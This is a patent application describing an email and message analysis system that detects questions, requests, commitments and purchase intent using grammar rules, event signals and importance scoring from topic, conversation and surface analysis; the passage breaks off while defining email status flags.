[0001] This application claims priority to U.S. provisional application 61/467,499 for ANALYZING EMAILS AND MESSAGES TO DISCOVER IMPORTANT COMMUNICATION AND ACTIONABLE INTENT, filed on Mar. 25, 2011, which is incorporated by reference for all that is disclosed therein.
BACKGROUND
[0002] As the world has moved into an always-on, real-time mode, traditional “news” and information sharing now occur between individuals and groups using email or other messaging platforms, or on websites and social media sites. Online information delivery has now overtaken traditional news services. Email, SMS, and blogs, as well as social media networks, have become the early indicators of what is happening at both the personal and the public level.
[0003] The increased speed of delivery and accessibility to news creates opportunities to better understand developing scenarios even as the growing volume of content creates challenges in sifting, filtering and identifying actionable information about the future.
[0004] While prior art has relied on descriptive, collocated, and frequently used keywords, together with a priori machine learning or training, to prioritize important email messages, these approaches are limited in detecting specific events or intent. The reason is that filtering based on a static set of keywords cannot recognize that a message carries an intent such as a question, an order, a commitment or promise, an expression of thanks, an apology, etc., collectively referred to as “speech acts.”
[0005] Some recent approaches in speech act detection have employed natural language processing (NLP) which would require understanding the language and the grammar. An example of this technique is using machine learning-based classifiers for detecting some email speech acts based on prior training. These classifiers may use n-gram selection, where n-gram refers to a contiguous sequence of n items from a given sequence of text or speech such as phonemes, syllables, letters, words, etc. One implementation of this approach is an email system that can identify the speech act of each sentence in an email message and perform actions appropriate to the speech act.
[0006] The challenge in developing a general-purpose event detection system is that it has to detect not only actionable intent such as speech acts but also specific classes of event occurrence.
SUMMARY
[0007] An embodiment for analyzing text provides a system, method, computer program, application, online service, and/or application program interface (API) for detecting predefined events or intent in any online communication, from messaging texts to online web posts. This includes detecting intent such as a question or request, a commitment to a request or to a purchase, or detecting sensitive information, such as private or medical information, being leaked in a message or post. Further, the event analytics engine can be customized to detect almost any class of intent or event, and is therefore applicable to a wide range of use cases, from customer support to lead generation.
[0008] The event detection engine combines natural language capability with an efficient, pipelined processing architecture so as to create a real-time, customized event detection framework. The text extracted from any source, whether a messaging platform, web page, or social media site, is parsed against predefined linguistic rules. These rules are specific to the class of events or intent that needs to be detected and codify the type of actors involved in the event and the type of action being monitored. Depending on the specific event and the use case, the detection logic can include signals such as entity names, which include persons, organizations, and locations such as GPS coordinates or explicit place names; expressions of times, quantities, monetary values, and percentages; as well as sentiment or opinion on the entity or the text.
[0009] The grammar rules are derived from the event or event class being defined. There are multiple methods to develop a corpus of sample or training data to build the event detection logic. This includes well-known primary language constructs of the event using action verbs representing the event or intent, alternate language constructs which includes constructs using synonyms of the action verbs or phrases with similar meaning as well as specialized constructs such as ad hoc idiomatic expressions. In addition, a corpus comprising examples of language constructs from actual usage instances may be used.
[0010] Once the set of language constructs has been compiled, the constructs are analyzed for common grammar constructs to identify common n-gram sequences. As part of the analysis, verb classes and the subjects and objects of the verbs, including pronouns and implied pronouns, are identified as required. The set of common n-grams and associated parts-of-speech values is used to create the minimal set of grammar rules required for the event detection. The minimal grammar rule set is used so that the parsing and application of grammar rules can be efficiently executed in real time on a single computing device such as a smart mobile phone (smartphone) or a client computer such as an email client.
[0011] The final determination of whether an event of interest has been detected is embodied in an event detection logic module. The event detection logic is defined by the grammar rules in combination with event signals, which include such concepts or entities such as specific names, location or time, or event sentiment or mood or opinion, that indicate the occurrence of the event.
[0012] The accuracy of the event detection engine is improved by continually updating the grammar rules and/or the event detection logic when user feedback is available, either explicitly or implicitly.
[0013] The methods may be implemented for multiple applications where event and especially intent detection is important, such as: a lightweight client application for a commercial email system such as Microsoft Outlook®, a plug-in for web mail such as Gmail® or Yahoo Mail®, applications (apps) for smart phones such as BlackBerry®, iPhone® and Android®, and a stand-alone web API such as a callable REST/JSON API that can be offered as a service to end users or third-party applications.
[0014] Implementations of the event detection analytics differ depending on whether the embodiment is on an end or client device like a phone, email client, or tablet, or on a server as a background web service. For instance, when the analytics are used for email intent detection on a smartphone or computer tablet, the engine
can be implemented as a part of the native email client. Also, based on user feedback the client application can update its event detection analytics module to improve its accuracy. When the event detection analytics is embodied as a Web API service, then the embodiment can be hosted on a web application hosting service such as Google App Engine® or Heroku®. The API in such a case can be a REST/JSON based API that allows users to send the text to be analyzed and have the API return the detected events or intents. The underlying components of the analytics engine are the same as in the case of the email client.
BRIEF DESCRIPTION OF THE DRAWINGS
Fig. 1 is a block diagram of an embodiment of a method for analyzing text.
Fig. 2 is a block diagram of another embodiment of a method for analyzing text.
Fig. 3 is a block diagram of another embodiment of a method for analyzing text.
Fig. 4 is a flow chart describing an embodiment for the construction of grammar rules.
Fig. 5 is a diagram of an intent detection analytics on a smart phone.
Fig. 6 is a diagram of an intent detection analytics API on a web application platform.
Fig. 7 is a diagram showing intent detection in a web mail system.
Fig. 8 is an example of a web site displaying information pertaining to analyzed text using different embodiments.
Fig. 9 is a diagram of event detection within an email web robot (bot).
Fig. 10 is an embodiment of a definition table for email status flags.
Fig. 11 is an example of intent detection and tracking displayed in an email client.
Fig. 12 is an example of a flagged email message having a question within the message.
Fig. 13 is an example of flagged email messages having Questions and Commitments within the messages.
Fig. 14 is an embodiment of email folders organized by detected intent.
Fig. 15 is an embodiment of a display of important contacts related to emails.
Fig. 16 is an embodiment of an intent detection email bot.
Fig. 17 is an embodiment of an intent detection plug-in for web mail.
Fig. 18 is an embodiment of API based implementation of intent detection.
Fig. 19 is an embodiment of event detection on a social media website.
Fig. 20 is an embodiment of a dashboard showing intent detection and tracking in customer and support personnel emails.
Fig. 21 is a special purpose computer system configured with an event detection system according to one embodiment.
DETAILED DESCRIPTION OF THE EMBODIMENTS
Analyzing text to detect events of interest relies on analyzing related data from many sources and using methods as described herein for specific purposes. With large scale search and data mining capabilities it is possible to find minuscule mentions of subtle indications about what is to come and detect early signals of such events. A related problem is how to detect specific events that one expects to occur, or detect a possible event by detecting a person’s intent from the messages or online information sources.
Examples of event detection of practical interest include detecting intent such as questions and commitments in messages, from personal to business emails, for increasing productivity, managing customer relationships in service organizations, generating sales leads, managing and creating marketing campaigns, and analyzing and segmenting customer data for product and service development.
This application describes a method for analyzing messaging and online posts to detect the occurrence of a pre-defined event including a possible future event based on detecting certain context and conditions. The method can be applied to filter large amounts of online information and detect specific events from any online source and on any client device, from desktops to computer tablets and smartphones.
FIG. 1 shows a general event detection system for the devices and methods described herein. As shown, the method works for any text provided from any source including email and messages from a messaging application like chat or instant messaging (IM), data posted on a web site or blog, and social media sites such as Facebook® or Twitter®. Text is extracted from these sources by the Text Extraction module 100 and then passed to the event detection analytics module 105. The event detection analytics module may include at least the following primary components: natural language processing (NLP) unit 110, event detection unit 120, grammar rules unit 130, event signals unit 140 and the event detection logic unit 150.
Once the text has been extracted 100 from the source, the NLP unit 110 applies the following steps as shown in FIG. 2. In the first step 201, the text is tokenized or the body of the extracted text is broken down to units referred to as “tokens” which may be words or numbers or punctuation marks. Tokenization does this task by locating word boundaries. Tokenization thus identifies all words in the text.
In the second step, the tokenized text is segmented 202. Segmentation divides the string of text units into its component sentences or the stand-alone phrases. Typically, in English and similar languages, punctuation marks such as period or full stop or semi-colon characters are used to denote the end of a sentence or stand-alone phrase.
Once the tokenized text has been segmented, in the third step the sentences or phrases obtained from segmentation are parsed for grammar 210. Parsing identifies the grammatical structure of sentences, i.e., which groups of words go together (such as a phrase), the tagged parts of speech, and the words that are the subject or object of the verb phrase. Once the grammatical structure has been derived, the meaning of the sentence can be determined through the application of relevant grammar rules.
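The tokenization 201 and segmentation 202 steps above can be sketched as follows. This is a minimal illustration only; the regular expression and the set of sentence-ending punctuation marks are assumptions, not the embodiment's actual implementation.

```python
import re

def tokenize(text):
    # Step 201: locate word boundaries; words, numbers, and
    # punctuation marks each become one token.
    return re.findall(r"\w+|[^\w\s]", text)

def segment(tokens):
    # Step 202: split the token stream into sentences / stand-alone
    # phrases at end-of-sentence punctuation.
    sentences, current = [], []
    for tok in tokens:
        current.append(tok)
        if tok in {".", "!", "?", ";"}:
            sentences.append(current)
            current = []
    if current:
        sentences.append(current)
    return sentences

sentences = segment(tokenize("Did you get my last message? Please send me an update."))
```

The token sequences produced here are what the parser 210 would receive in the next step.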
The grammar rules 130 to be applied are defined by the event 120 that is to be detected. Since grammar for natural languages can be ambiguous, a sentence or phrase can have multiple possible analyses and therefore meanings. By applying rules of grammar that are specific to the event, the meaning behind the sentence can be derived. In this application, a grammar rule therefore refers to the rule or condition that a
sequence of parsed text must satisfy to indicate an event or intent category. Thus, a grammar rule can specify that the parsed units in the text, such as noun, verb phrases, or adjective, and their combinations meet certain predefined conditions and values. It can include determination of the subject of the verb and the person, 1st, 2nd or 3rd, of the subject and object.
In many cases, the event or intent detection may include event signals 140. These signals may be independent of the grammar rule conditions. For example, if the intent to be detected is a promise by the sender of a message or post, such as, “I will be going”, then an intent to go on a certain day would look for a date or day, such as “today”, “tomorrow”, or “Tuesday”. Thus, a commitment intent to go on a certain day would be detected if the grammar rule detects a commitment involving “going” or “traveling” and a co-located mention of a day such as specific weekday, (Monday through Sunday), or today or tomorrow. The latter condition on the day would be checked by the event detection logic that analyzes both the output of the parser 210 and the event signals 140.
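As a sketch of how a grammar rule and an event signal combine in the event detection logic 150, the "commitment to go on a certain day" example can be illustrated as follows. The verb list and day vocabulary are hypothetical stand-ins for the grammar rules 130 and event signals 140.

```python
import re

# Hypothetical stand-ins for the grammar rules (130) and the
# day-of-travel event signals (140).
COMMITMENT_VERBS = {"go", "going", "travel", "traveling"}
DAY_SIGNALS = {"monday", "tuesday", "wednesday", "thursday", "friday",
               "saturday", "sunday", "today", "tomorrow"}

def detect_travel_commitment(sentence):
    # Fire only when BOTH conditions hold: a commitment pattern
    # ("I will ... <travel verb>") AND a co-located day mention.
    words = [w.lower() for w in re.findall(r"\w+", sentence)]
    has_commitment = False
    for i in range(len(words) - 1):
        if words[i] == "i" and words[i + 1] == "will":
            # allow auxiliaries like "be" between "will" and the verb
            if any(w in COMMITMENT_VERBS for w in words[i + 2:i + 5]):
                has_commitment = True
    has_day = any(w in DAY_SIGNALS for w in words)
    return has_commitment and has_day
```

Note that neither condition alone triggers detection, mirroring the conjunction of parser output and event signals described above.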
In addition to the use of event signals, the event detection logic may check for a match of the noun phrases with predefined key phrase of interest. Key phrases of interest refer to specific topics or names of entities, including persons, places, locations, products, or services.
There are at least two possible implementations of the event detection analytics module 105. The first includes parsing 210 with grammar rules 130 as shown in FIG. 2. Alternately, as shown in FIG. 3, the event detection analytics module 105 can be built without need for parsing but only use an event detection logic 150 on the parsed text units. Thus, detecting any event about an entity such as a smartphone would require getting the output of the segmentation 202 and doing a match on the noun phrases with the specific smartphone. No grammar rules may be required.
For complex event detection, event detection analytics 105 will include a parser 210 and grammar rules 130. One approach to deriving grammar rules 130 from an event definition 120 is shown in the flowchart of FIG. 4.
Event detection 120 will typically include an explicit specification of the type of event to be detected, i.e., what types of actors are involved in what action, or what action occurred in nature. Event definitions range from an intent, such as a question being asked of the receiver or a commitment by the sender or poster of the message relating to an interest in purchasing a specified item, to a natural occurrence such as rain. Once the event is specified, different possible linguistic constructs are considered. These can include well-known primary language constructs 410 that describe the event using action verbs representing the event. They can also include alternate linguistic constructs 430, which cover synonymous expressions of the primary construct, i.e., sentences or phrases that give similar or equivalent descriptions of the event, as well as colloquial or ad hoc idiomatic expressions. Another form of language construct is drawn from a corpus comprising examples of language constructs that indicate the event, collected from actual user feedback 410.
Once the set of language constructs has been compiled, the constructs are analyzed for common grammar constructs to identify common patterns such as frequently observed n-gram sequences, common verb phrases, and associated parts-of-speech values. This analysis step then categorizes the compiled constructs into a set of common grammatical constructs 440. Each set of common grammatical constructs is converted into a formal grammar rule.
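The n-gram analysis over the compiled example constructs can be sketched as below. The sample constructs and thresholds are illustrative assumptions; a real corpus would be far larger.

```python
from collections import Counter

def common_ngrams(constructs, n=3, min_count=2):
    # Count n-gram sequences across the compiled example constructs;
    # sequences seen at least min_count times seed the common
    # grammatical construct categories.
    counts = Counter()
    for text in constructs:
        words = text.lower().split()
        for i in range(len(words) - n + 1):
            counts[tuple(words[i:i + n])] += 1
    return [g for g, c in counts.most_common() if c >= min_count]

# Hypothetical example constructs for a "request" event:
examples = [
    "can you send me the report",
    "can you send the file today",
    "please can you send an update",
]
frequent = common_ngrams(examples)
```

Here only the trigram shared by all three constructs survives the frequency cutoff, and would be a candidate for formalization as a grammar rule.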
One desired constraint in creating the set of grammar rules is to select the minimal set of rules required for the event detection. Using the minimal number of grammar rules ensures the most efficient parsing of the text and the application of grammar rules. Having the smallest set of grammar rules not only results in the shortest processing time in event detection but also reduces the memory footprint. This in turn enables running the event detection system on a single computing device such as a smartphone, a computer tablet, or a client computer such as an email client.
A number of embodiments of the event detection, especially intent detection, in emails or any text, have been implemented as shown in the demo web site page shown in FIG. 5. The embodiments in this demo web site include a web HTTP API, a smartphone library such as for a commercial operating system as Android®, and for an email client such as Microsoft Outlook®.
An efficient event detection processing system allows implementation across many different devices, from a smartphone to a server. These different embodiments are now described in FIGS. 6 to 9.
FIG. 6 shows an embodiment of a special case of event detection, intent detection for emails, in a smartphone. In this embodiment, the email client application 600 that runs on a mobile phone operating system 650, such as Android®, is modified to include the event detection analytics module 630. As with all email clients, the client application fetches and stores email locally using IMAP or POP3 protocols without user supervision. Upon receiving new emails of interest 610, the analytics gives them a score 615 depending on the confidence level of detecting intent such as a question or request, or commitment or promise. In addition, the embodiment may allow the user to review the intent score or flag and provide feedback 620 to the client. The feedback can then be used to update the grammar rules 130 and/or event detection logic 150 for accuracy improvement.
FIG. 7 shows event detection analytics powering an API 700 running on web application platform 750. The API 700 can be called over HTTP 710 to analyze text for a given source. As with the previous embodiment the event detection analytics analyzes the email and assigns the score for the intent. As with the other embodiments, the event detection analytics 630, grammar rules 130 and/or event detection logic 150, can be updated with each API call and stored on the server with user feedback 620 without any user supervision.
FIG. 8 shows event detection analytics 630 used within a web mail, such as Gmail® contextual plug-in 800. The email 610 is provided to the plug-in 800 by the API 700 as in the case of the web API described in FIG. 7. The API 700 assigns the score for the intent and provides the result to the user via the plug-in 800. User feedback 820 is provided by the plug-in 800 to the API 700 to update the event detection analytics 630.
FIG. 9 shows event detection analytics 630 powering an SMTP endpoint 910 running on a web application platform 850 for implementing an email web robot or bot 1000. The bot 1000 is called over SMTP 910 to analyze text in the body of email. As before the event detection analytics 630 calculates the intent score when an intent is detected. The event detection analytics 630 can be updated with each SMTP call and stored on server with user feedback 620.
Having summarily described some embodiments of the devices and methods, more detailed descriptions will now be provided. The methods and devices described herein may be used in the following applications:
- Email including email on smart phones and desktop email;
- Web based API for general web applications, including CRM, social media marketing and engagement; and
- General event detection such as sensitive information or data leak protection (DLP).
Described herein and as shown in FIGS. 1-4 are techniques for a generalized intent detection system, including an email analysis system. Although the approach uses email and messaging systems as an example, it is directly applicable to any electronic posts or communication such as social media posts, comments, and chat. In the following description, for purposes of explanation, numerous examples and specific details are set forth in order to provide a thorough understanding of embodiments of the present invention. Particular embodiments as defined by the claims may include some or all of the features in these examples alone or in combination with other features described below, and may further include modifications and equivalents of the features and concepts described herein.
Email Message Intent Detection Approach
Particular embodiments analyze emails so as to detect:
- Action Item or Request Emails—those that have questions or requests from a sender for the user and need a response;
- Commitment Emails—the counterpart to Action Items—those in which the sender promises or offers to complete or execute an action; and
- Intent to Purchase—a special derivative case of Commitment that uses the Commitment Detection logic and other signals to build this Intent Detection.
Particular embodiments identify many different types of email based on a number of factors. Thus, in addition to identifying which emails should be flagged as Action Item or Commitment that the user needs to read, particular embodiments also identify messages that are important to the user. While there are many possible factors that determine what messages are important to the user, there are some criteria that are used in defining importance. Some key factors that determine importance of a message may include:
- Sender: not all senders are equally important; every user has key working, subordinate, or personal relationships with a few contacts. The user has frequent conversations with these contacts. Therefore, messages from these contacts may have higher priority than those from other contacts. Further, even among contacts that the user converses with, there will be a relative order of importance.
- Content Topics: there may be explicit topics that the user may be discussing currently that will take precedence over topics that were discussed in the past. For example, the user may be discussing a current client’s project that may be evident in recent emails but not a completed project that had been a topic of discussion in the past.
- Unstated Intent: there may be implicit topics or intent that the user may be considering that are not expressed in the user’s message content. For example, if the user is planning vacation travel to a given destination, the user may be interested in a promotional email from an airline offering a discount to that destination, even if the user is normally not interested in such offers.
Given the above criteria of importance, and the expectation that the user will usually respond to questions in messages or track responses by contacts of whom the user has asked questions, the analysis system may track the following to determine which emails the user will want to read or respond to:
1. Content—using a number of indicators that include, but are not limited to:
- a. Keywords that identify action verb or verb phrases or commitment words or phrases, as well as special cases such as commitment to purchase or buy;
- b. Grammar rules that identify if a sentence or phrase within the email body contains an action item or commitment;
- c. Elimination of false positives by identifying verbs or verb phrases that do not connote action items or commitments.
2. Sender—using a number of indicators that include, but are not limited to:
- a. Importance of the senders: senders with which the user has had conversations;
- b. Relative importance based on response latency: how quickly the user responds to the sender.
3. Topic or Context—using a number of indicators that include, but are not limited to:
- a. Current topic of discussions that user is interested in;
- b. Decreasing interest over time in a topic if there has been no mention in recent conversation;
- c. Key interest phrase: the key interest phrase is a text phrase that indicates the context or more specifically, the entity names of the intent to be detected.
The importance may be based on the above factors being quantified. Importance may be determined based on a threshold.
Intent Detection Implementation
The intent detection architecture that includes the messaging analysis system described herein can be implemented in any email client device or in a server, or can be functionally split across the client and the server. A few example implementations are as follows:
1. Analytics running on the client device as shown in FIG. 6: all email processing functions from analytics to user actions or follow-up activities may be contained in the client. More details on these actions and follow-up activities are described below.
2. Analytics running on the server as shown in FIG. 8: all email processing functions from analytics to user actions or follow-up activities may be done by the server.
3. Analytics on server and synchronization across multiple client devices: all email processing functions from analytics to user actions or follow-up activities may be done by the server, and a user management
module may manage synchronization of the user’s actions and follow-ups across multiple messaging client devices.
Email Priority Analysis System
[0088] The priority email analysis rates the relative importance of the user's incoming email messages. This is done by the event detection analytics component. The importance ratings assigned by the analysis component can then be used to automatically highlight the important messages, or those messages in which request intent or commitment intent is detected.
[0089] The criteria by which the analysis component rates message importance will be described below. In the embodiments described herein, the analysis component is divided into three sub-components, which independently assign an importance score to each given message, based on different types of features. The sub-components are listed as follows:
[0090] Content Analysis—analysis of important terms (tokens) that occur in the body and subject of a message.
[0091] Conversation Analysis—analysis of the patterns of prior conversation between the message sender and the user.
[0092] Surface Analysis—analysis of (pre-defined) features in the body of the message, such as “urgent” or “!” (exclamation mark), message length, etc.
[0093] The overall message importance score can be a function such as an aggregated composite (e.g., an arithmetic sum) of the three scores returned by each of the sub-components.
[0094] Each sub-component is first trained on a sufficient (~100-500) number of most recent messages (“training set”) in the inbox and outbox of the user. This yields a data model for each sub-component; models should be periodically retrained. Subsequently, new incoming messages can be evaluated using these models.
[0095] To summarize, each sub-component has two main public methods:
[0096] Model.trainModel (Inbox, Outbox)—training
[0097] float.rateMessage (Message, Model)—evaluation
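The two-method sub-component interface can be sketched as a Python class, shown here for Surface Analysis. The urgency feature list and the scoring formula are assumptions used purely for illustration; the other sub-components would fit richer data models in `train_model`.

```python
class SurfaceAnalysis:
    # Pre-defined surface features; this list is an assumption.
    URGENCY_FEATURES = ("urgent", "!", "asap")

    def train_model(self, inbox, outbox):
        # Surface analysis needs no statistics from the training set in
        # this sketch; Content and Conversation Analysis would derive
        # their models from the inbox/outbox here.
        return {"features": self.URGENCY_FEATURES}

    def rate_message(self, message, model):
        # Score = fraction of pre-defined features found in the body.
        body = message.lower()
        hits = sum(f in body for f in model["features"])
        return hits / len(model["features"])

analyzer = SurfaceAnalysis()
model = analyzer.train_model(inbox=[], outbox=[])
```

The overall message importance would then aggregate (e.g., sum) this score with the Content and Conversation scores, as described above.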
[0098] A detailed description of different email analysis components is provided in Section 3.
Analytics Components
[0099] The analytics components may include the following components:
[0100] Action Detector
[0101] Commitment Detector
[0102] Topic Analysis
[0103] Conversation Analysis
[0104] Interaction Analysis
[0105] Repeated Text Detector
[0106] Tokenizer
Action Detector
[0107] The action detector is a module responsible for detecting action items (i.e., intents of questions or requests) in the email messages. Examples of these questions/requests are:
[0108] “Did you get my last message?”
[0109] “Please send me an update.”
[0110] “Let’s work on this tomorrow.”
[0111] Detected action items can be used to determine message importance. When intent is detected in a message, the text of that message is highlighted by the user interface to provide the indication to the email recipient.
[0112] The action detector is initialized with the grammar rules that are a key component of the event detection analytics described earlier in FIGS. 1-3.
Grammar Rules
[0113] Examples of grammar rules used to detect an action item intent are as follows:
[0114] ?:Verb=send|work|email
[0115] +did_you_Verb * ?
[0116] +please_Verb
[0117] +let's_Verb
[0118] During initialization, the action detector builds an internal data structure corresponding to the grammar rules.
[0119] When a new message is received for analysis, the Action Detector first calls the Tokenization unit to split the message into tokens, and then it scans the resulting sequence of tokens for patterns matching those specified by the grammar rules. The list of matching patterns (and their corresponding location(s) in the message) is returned.
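The scan step can be sketched as follows, with the grammar rules encoded as token-sequence patterns in which `Verb` matches any verb in a small, hypothetical lexicon.

```python
import re

# Hypothetical encoding of the action-item grammar rules as
# token-sequence patterns; "Verb" matches any verb in the lexicon.
VERBS = {"send", "work", "email", "meet", "call"}
RULES = [
    ("did", "you", "Verb"),
    ("please", "Verb"),
    ("let's", "Verb"),
]

def scan_for_action_items(message):
    # Tokenize, then slide each rule over the token sequence and
    # return (rule, start index) pairs for every match.
    tokens = [t.lower() for t in re.findall(r"[\w']+|[^\w\s]", message)]
    matches = []
    for rule in RULES:
        for i in range(len(tokens) - len(rule) + 1):
            window = tokens[i:i + len(rule)]
            if all(p == w or (p == "Verb" and w in VERBS)
                   for p, w in zip(rule, window)):
                matches.append((rule, i))
    return matches
```

The Commitment Detector would reuse the same scanning machinery with a different rule set, as the text notes below.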
Commitment Detector
[0120] The commitment detector is a module responsible for detecting commitments, i.e., statements made by the sender that imply a promise or a commitment in the email messages. Examples of commitments are:
[0121] “I will look into this.”
[0122] “Let’s meet next week.”
[0123] “Tuesday works for me.”
[0124] The commitment detector works like Action Detector described earlier, except that it is initialized with a different set of grammar rules designed for detecting commitments.
Topic Analysis
[0125] Topic Analysis determines importance based on the presence of important terms that comprise a topic. Detected topics can be used to determine message importance and/or highlighted by the user interface.
[0126] The set of topics and their associated valence scores are determined statistically by training the Topic Analysis on a set of existing email messages.
[0127] At a high level, the valence scores are determined by the difference of probabilities of being in the outgoing messages versus incoming messages (i.e., words in the outgoing messages are used as a proxy of what is important to the user).
[0128] More specifically:
\[
\text{score}(t) = \frac{\text{count}_{\text{out}}(t) - \text{count}_{\text{in}}(t)}{\text{count}_{\text{out}}(t) + \text{count}_{\text{in}}(t)}
\]
where \(\text{count}_{\text{out}}(t)\) and \(\text{count}_{\text{in}}(t)\) denote the number of occurrences of term \(t\) in the user's outgoing and incoming messages, respectively.
[0129] This results in a score between 1.0 and -1.0. The higher the score, the more likely a term is to appear in the outgoing messages, and thus the higher its importance. Conversely, if the term occurs in the incoming messages but not in outgoing messages, it is probably less important (i.e., messages containing the term are more often ignored).
Words in a predefined stopword list, as well as a custom blacklist are excluded from consideration. Morphological variants ("runs", "running") are collapsed into the canonical form ("run"), using a stemming table for common words. Tokens are treated in a case-insensitive way. The importance of a (new) email message E (and given Topic Analysis model M) is simply the sum of the scores of the valence scores for topics present in the model, possibly normalized by the total length of the message:
\[
\text{importance}(E) = \sum_{t \in \text{topics}(E)} \text{score}(t)
\]
The raw message topic score is normalized by the mean and standard deviation of importance scores calculated from the messages in the training set.
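The valence-score training and the length-normalized message importance can be sketched together as below; the mean/standard-deviation normalization over the training set is omitted for brevity, and stopword/stemming handling is left out.

```python
from collections import Counter

def train_topic_model(inbox, outbox):
    # Valence score per term: (out - in) / (out + in); terms the user
    # writes are a proxy for what is important to the user.
    out_counts = Counter(w for m in outbox for w in m.lower().split())
    in_counts = Counter(w for m in inbox for w in m.lower().split())
    return {t: (out_counts[t] - in_counts[t]) / (out_counts[t] + in_counts[t])
            for t in set(out_counts) | set(in_counts)}

def topic_importance(message, model):
    # Sum the valence scores of model terms present in the message,
    # normalized by the message length.
    words = message.lower().split()
    return sum(model.get(w, 0.0) for w in words) / max(len(words), 1)

# Hypothetical one-message inbox/outbox for illustration:
model = train_topic_model(inbox=["newsletter offer"],
                          outbox=["project deadline project"])
```

Terms that appear only in outgoing mail score +1.0, terms only in incoming mail score -1.0, and unseen terms contribute nothing.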
Conversation Analysis
Conversation Analysis determines the importance of a message based on the past patterns of email exchange between the user and the sender of a given message. The Conversation Analysis model contains a list of email addresses (senders) and the corresponding importance score. The importance score of an email address is proportionate (among other factors) to the difference between the fraction of the outbound messages in the training set sent to the email address and the fraction of the inbound messages received from a given address, i.e.:
\[
\frac{\text{count}(\text{outbound to } a)}{\text{size}(\text{outbox})} - \frac{\text{count}(\text{inbound from } a)}{\text{size}(\text{inbox})}
\]
The conversation analysis score of a new inbound message is simply the importance score of its sender.
The raw conversation score for a new message is normalized by mean and standard deviation calculated from the inbound messages in the training set.
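The sender-importance computation and lookup can be sketched as follows; representing the inbox and outbox as simple lists of addresses (and omitting the training-set normalization) is an assumption for illustration.

```python
from collections import Counter

def train_conversation_model(inbox_senders, outbox_recipients):
    # Per-address importance: fraction of outbound messages sent to the
    # address minus fraction of inbound messages received from it.
    sent = Counter(outbox_recipients)
    received = Counter(inbox_senders)
    return {a: sent[a] / max(len(outbox_recipients), 1)
               - received[a] / max(len(inbox_senders), 1)
            for a in set(sent) | set(received)}

def conversation_score(sender, model):
    # The score of a new inbound message is its sender's importance.
    return model.get(sender, 0.0)

# Hypothetical training data: the user replies to boss@x but
# never writes to the mailing list list@y.
model = train_conversation_model(
    inbox_senders=["boss@x", "list@y", "list@y", "list@y"],
    outbox_recipients=["boss@x", "boss@x"])
```

Addresses the user writes to often score positively; high-volume senders the user never answers score negatively.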
Interaction Analysis
Interaction Analysis is used to help predict the importance of certain conversations, topics or persons, based on the past patterns of user interaction (i.e., actions taken with email user interface) on relevant messages. The Interaction Analysis model takes into account features like:
- Time taken to open with respect to other email reading behavior.
- Time message remained "open" on device.
- How many times that email was opened before taking an action.
- Action taken after reading the message.
Repeated Text Detector
Repeated Text Detector is designed to detect regions of text that are repeated across emails from certain senders (e.g., corporate template, legal disclaimer). These repeated regions are unlikely to contain new information and are excluded from consideration by Action Detector, Commitment Detector and Topic Analysis. Repeated Text Detector keeps a record of the lines seen in past messages from each sender. If a line is seen more than a minimum number of times in messages from a given sender, those lines are considered repetitive. Given a new email message, Repeated Text Detector finds the regions that are repeated in this way, so they can be ignored.
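A minimal sketch of the per-sender line-counting approach, assuming a repetition threshold (`min_count`) as the criterion:

```python
from collections import defaultdict

class RepeatedTextDetector:
    def __init__(self, min_count=3):
        self.min_count = min_count
        # per-sender counts of each (non-empty, stripped) line seen
        self.counts = defaultdict(lambda: defaultdict(int))

    def observe(self, sender, message):
        for line in message.splitlines():
            line = line.strip()
            if line:
                self.counts[sender][line] += 1

    def repeated_lines(self, sender, message):
        # Lines seen at least min_count times in past messages from
        # this sender (e.g., signatures, legal disclaimers).
        return [line for line in message.splitlines()
                if self.counts[sender][line.strip()] >= self.min_count]

det = RepeatedTextDetector(min_count=2)
det.observe("a@x", "Hi there\nLegal disclaimer.")
det.observe("a@x", "Bye now\nLegal disclaimer.")
```

The lines returned by `repeated_lines` would be masked out before the message is passed to the content-analysis modules.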
Tokenizer
Tokenizer takes the text of a message or any online posts, and returns a sequence of tokens corresponding to words, punctuation symbols, and special symbols (e.g. start of sentence in the message). These token sequences are used by other modules (such as Action Detector) to perform analysis.
Email Scoring
The determination of whether an email is flagged (for an Action Item or a Commitment) is based on a function of different scores.
Three components are used currently to determine whether an email is flagged:
- Conversation Score—score from the analysis of the patterns of prior conversation between the message sender and the user
- Surface Score—score from the analysis of (pre-defined) features in the body of the message, such as "urgent" or "!", message length, etc.
- Content Score—score from the analysis of important terms (tokens) that occur in the body & subject of a message
As described earlier, the scores are defined as follows:
- Conversation Score: normalized score that indicates if there has been prior conversation between the User and the Sender. The score is higher when there is more exchange of email between the User and Sender. The score would be 0 if the User never responds or replies to email from the Sender. High scores indicate that the Sender is important to the User. The conversation score of a Sender can be a time-dependent function, since the importance of a Sender can increase or decrease over time.
- Surface Score: normalized score that indicates there is a "speech act" in the body of the received email, or in the header if the initial message (i.e., not the reply) had a question or a response request from the Sender for the User. The Surface Score is independent of the Sender and constant over time, since it is based only on "tokens" in the received email body.
[0161] Content_Score: indicates that the received email contains words or phrases related to current topics that the User is interested in. Current topic of interest is determined by the related tokens that occur with highest frequency. Content score of a topic is usually a decaying function of time especially as new topics surface in the email conversations.
[0162] All scores may be normalized to values between 0 and 1.
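As a concrete illustration of the three score definitions above, the following sketch computes each as a value in [0, 1]. The specific formulas, the cue-token list, and the half-life decay constant are illustrative assumptions, not taken from the source:

```python
def conversation_score(replies_by_user, emails_from_sender):
    """Fraction of the Sender's emails that the User replied to.
    0 if the User never responds; higher with more exchange."""
    if emails_from_sender == 0:
        return 0.0
    return min(1.0, replies_by_user / emails_from_sender)

def surface_score(tokens, cue_tokens=("urgent", "!", "?", "asap")):
    """Share of pre-defined cue tokens present in the message body."""
    present = sum(1 for cue in cue_tokens if cue in tokens)
    return present / len(cue_tokens)

def content_score(message_tokens, topic_last_seen_days, topic_tokens,
                  half_life_days=14.0):
    """Overlap with the current topic of interest, decayed over time
    as new topics surface in the email conversations."""
    if not topic_tokens:
        return 0.0
    overlap = len(set(message_tokens) & set(topic_tokens))
    decay = 0.5 ** (topic_last_seen_days / half_life_days)
    return min(1.0, overlap / len(topic_tokens)) * decay
```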
Flagging Important Emails
[0163] There are many ways to flag important messages and emails. Here we include two implementations for illustration. In the first case, all emails are flagged with specific symbols or flags on the client email display:
[0164] : represents an Action Item email which contains a question or request that needs a response from the user
[0165] : represents an Important email that would be of interest to the user but no Action is expected of the user
[0166] : represents a FYI (for your information) email where no action is required and which may not be of interest to the user; it may be deferred for later reading and dispensed with as the user chooses, including deleting it
[0167] FIG. 10 shows the logic table for the determination of email status flags, after intent detection analytics has been executed on the emails.
[0168] The definition for the status value of the Flag is based on the following assumptions:
